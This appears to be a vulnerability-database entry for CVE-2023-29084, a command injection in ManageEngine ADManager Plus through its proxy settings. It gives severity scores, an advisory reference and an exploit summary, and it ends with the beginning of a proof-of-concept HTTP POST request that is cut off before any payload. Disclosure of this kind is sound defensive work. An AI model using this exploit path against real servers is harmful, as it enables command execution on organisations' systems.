CVE-2023-29084

Published: 13/04/2023 Updated: 26/06/2023
CVSS v3 Base Score: 7.2 | Impact Score: 5.9 | Exploitability Score: 1.2
VMScore: 0

Vulnerability Summary

Zoho ManageEngine ADManager Plus prior to build 7181 allows authenticated users to exploit command injection via Proxy settings.

Vulnerable Product

zohocorp manageengine admanager plus 7.1

zohocorp manageengine admanager plus

Vendor Advisories

Check Point Reference: CPAI-2023-0226 Date Published: 2 May 2023 Severity: High ...

Exploits

ManageEngine ADManager Plus versions prior to build 7181 are vulnerable to an authenticated command injection vulnerability due to insufficient validation of user input when performing the ChangePasswordAction function before passing it into a string that is later used as an OS command to execute ...

GitHub Repositories

Command injection in ManageEngine ADManager Plus

CVE-2023-29084
Command injection in ManageEngine ADManager Plus

PoC

POST /api/json/admin/saveServerSettings HTTP/1.1
Host: 10101099:8080
Content-Length: 183
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Con